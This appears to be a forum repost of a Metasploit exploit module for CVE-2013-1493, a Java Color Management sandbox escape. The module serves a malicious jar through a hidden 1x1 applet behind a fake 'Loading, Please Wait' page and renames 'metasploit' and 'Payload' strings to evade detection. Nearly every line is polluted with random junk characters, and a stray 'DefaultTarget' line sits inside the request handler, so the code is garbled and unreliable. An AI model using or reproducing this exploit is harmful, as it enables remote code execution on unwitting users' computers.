##/ S( _, L5 t6 x) s, z
+ t2 f6 q/ i ^1 y# This file is part of the Metasploit Framework and may be subject to' o U9 s7 e8 n" G" ~
# redistribution and commercial restrictions. Please see the Metasploit7 d, D: U% @2 m( w5 U# _
# web site for more information on licensing and terms of use.* l5 X# l4 b: C7 v. B
# http://metasploit.com/6 e& P% s u# o
##
8 x" L( h% D' T" H9 H) {1 w# ~1 r# `require ‘msf/core’
+ g. Q5 A5 ]/ S- s# D2 ?- frequire ‘rex’7 E9 d: M) b ~/ Z: e
class Metasploit3 < Msf::Exploit::Remote
8 R8 {% \, A# A# J7 J& W- URank = NormalRanking* z$ }" d ?+ P# i5 k6 ^- E( Z
include Msf::Exploit::Remote::HttpServer::HTML* T, j5 O$ E* S0 ]( _
include Msf::Exploit::EXE0 o$ d2 r* \9 i6 D+ L% k
include Msf::Exploit::Remote::BrowserAutopwn
( l0 t; [8 k% K0 S! q- }1 }9 K8 J0 cautopwn_info({ :javascript => false })
/ L. _6 i6 n! qdef initialize( info = {} )# r, Z4 D$ F0 W8 ]! V
super( update_info( info,
5 `- Q* N9 `2 ]2 T L. [% P0 H‘Name’ => ‘Java CMM Remote Code Execution’,
" G* s! {/ W) r" W2 X( {‘Description’ => %q{
' i6 }9 L Y1 v1 X/ @) @0 u- {This module abuses the Color Management classes from a Java Applet to run
2 _2 G4 M. s0 P+ `% N/ ~arbitrary Java code outside of the sandbox as exploited in the wild in February, S& v1 g' f B4 J, j3 Q
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
/ g: g7 u/ [" w6 h5 A! u2 P; Zand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP18 H& g* g Z [0 |
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java1 v1 B, q! @. u" K# o4 e7 C0 p
warning in order to run the malicious applet.
! n' |3 A- R2 k' ^0 d/ j& P1 c i},
. N$ a H' f% b‘License’ => MSF_LICENSE,
- r* F0 y' b6 t. ]% t# i‘Author’ =>. d6 |# t- _" }- e1 _; S. Y5 G6 z
'Unknown', # Vulnerability discovery and Exploit( @) ^6 F/ ] I) E
'juan vazquez' # Metasploit module (just ported the published exploit). t8 `8 z4 ]5 N G4 c5 Q9 v" ^
],+ r) l. p3 i1 i7 [
‘References’ =>$ o9 d1 m2 M8 s+ s, G4 Y& {( {2 d
[! @" H' z, Z( h; [
[ 'CVE', '2013-1493' ],
! b& Y, n7 S( y& n% n[ 'OSVDB', '90737' ],
+ K! Y7 I0 O. h[ 'BID', '58238' ],
. ?6 B0 g3 `) B# i[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],7 I* p$ ^9 y0 S. j F
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
5 g- p4 d2 E. \: n( \[ 'URL', 'http://pastie.org/pastes/6581034' ]4 y- v$ C7 v1 ?5 ~- s
],
3 _9 N; I% j( k. l5 M: _, U9 z7 H‘Platform’ => [ 'win', 'java' ], L/ G- p' M$ {. g' u9 K
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },4 m; G; ]4 G2 L/ I5 f2 ~- Z
‘Targets’ =>
R% m- c) b/ }3 w1 Y[& M+ E! G6 E' `3 i4 {* v2 `
[ 'Generic (Java Payload)',
; N! ^% b8 ~' G( D6 r3 F( D: s{
6 L0 i- E s+ W. P% S'Platform' => 'java',, ^6 f. {4 c7 e
'Arch' => ARCH_JAVA! A+ n6 u0 H0 J; T6 @
}
/ `$ y. M s6 k) V* e],
/ g5 A% ]! n% K9 }# {5 G* [% C. s! `[ 'Windows x86 (Native Payload)',
$ i3 S: I+ J. ~{% J; p7 D7 J" v) c+ Z. W
'Platform' => 'win',8 U4 W; H9 ?: l+ C+ a
'Arch' => ARCH_X868 `5 ^: P3 @# ~9 x2 R7 j; Q
}' f% W! t! g# H
]
! ^0 V( v( k6 o2 | N],
; W/ A1 K1 {0 A8 B" o‘‘DisclosureDate’ => ‘Mar 01 2013′+ L2 P G+ Z$ o6 S; {
)), F: u; N8 P" I0 N
end/ D. q0 H# u2 }0 W
def setup
+ @# ?$ \) ]- c# M$ @; M! Vpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)2 c7 R+ B5 H6 d; o
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. ^* q, L2 a8 D5 a, C7 z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)' A2 x& d9 i) [- l! F8 y* Q% g* X5 `
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }: y/ v O2 E6 v7 x3 k
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)% e3 C3 Q& G* @' p; R3 N
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) X( k' }( {! R- ~/ D- t0 x
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
; Q: A2 F, q' g& ~9 X3 k@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 O7 \. M" T: ? _6 v0 K! q" C4 h@init_class_name = rand_text_alpha(“Init”.length) n+ S- f5 j$ [2 O! `
@init_class.gsub!(“Init”, @init_class_name) K! Q* b* ^) B+ Y& R
super
4 I) U' l6 z" u$ U9 \( Cend
! [9 S5 p; W' X" }9 J8 Ndef on_request_uri(cli, request)
& x+ o1 m+ n( q0 c9 L' o5 Xprint_status(“handling request for #{request.uri}”)- Y* P3 C* q& d/ W
case request.uri
# H* w; }' [9 _) E: Owhen /\.jar$/i. e8 b: _& E! O' e2 L
jar = payload.encoded_jar: ~1 n/ ], l+ E' |' @( x/ c
jar.add_file(“#{@init_class_name}.class”, @init_class)0 D- ~2 O X* d* b9 Y
jar.add_file(“Leak.class”, @leak_class)4 E5 a% i% h' f9 h& ^5 C. Y
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 ]- U% t/ S; {4 H6 d" x8 u
jar.add_file(“MyColorSpace.class”, @color_space_class)
% I- e! R' F: ]1 T( KDefaultTarget’ => 1,3 ~: V( W' W. H" g( Y* u- _6 T
metasploit_str = rand_text_alpha(“metasploit”.length)) f0 _( K1 Y: |$ [4 X
payload_str = rand_text_alpha(“payload”.length)1 F( N8 J# ~# Q- d
jar.entries.each { |entry|7 S& a# Y2 W! j' i j; ^
entry.name.gsub!(“metasploit”, metasploit_str)
1 ?7 o& i; Q* |1 ~4 kentry.name.gsub!(“Payload”, payload_str)9 D) v' B3 S& O) O9 ~
entry.data = entry.data.gsub(“metasploit”, metasploit_str); `4 c/ b8 ~; Z$ h3 J
entry.data = entry.data.gsub(“Payload”, payload_str)
' u* L( N0 }- N5 s0 m& |9 o) U- t}' m& Q3 x+ }# X% m: J
jar.build_manifest
6 _( K; r2 `% v# B" [send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
8 H$ Z+ [& k6 e- X" Pwhen /\/$/
* k$ P) m; @( V# v5 P9 npayload = regenerate_payload(cli)
8 F* L2 J; E1 I0 Sif not payload
- E+ p2 C* D# ?/ z, S# Pprint_error(“Failed to generate the payload.”)) S& F4 R# Q5 g9 q
send_not_found(cli)# Q9 Y, x) h+ E c
return" E1 L% j: P# v0 ?) u+ p
end
3 q% }4 w. F% Gsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }); k8 Y% }* C+ E& x% P! _' a( I
else
6 i1 S9 |" Q* `7 |# wsend_redirect(cli, get_resource() + ‘/’, ”)
& a8 C' Y; f. C& v& R0 Qend1 e9 i' `% L' y' J( [6 q! \
end
7 U6 B9 M/ I- |def generate_html% a! U2 L# B. n+ s5 _
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|( _4 c1 W) N/ R/ C- n9 W3 k
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
6 _* o4 G+ v% c5 G! L X6 _- V' jhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|' V* ?/ l3 ~# E3 V- e" X& h0 R( ~+ \( K
html += %Q|</applet></body></html>|
+ n0 P2 m; f; r7 ]6 w% ]9 x, breturn html; z/ o# G9 l! k/ ]0 C- |
end
y* ~) w- D' x* q" \6 Mend
& S5 A" p' v: w& [1 `& wend
* ?! t! I, }, q, f |
发表于 2013-4-4 17:31:17
收藏
支持
反对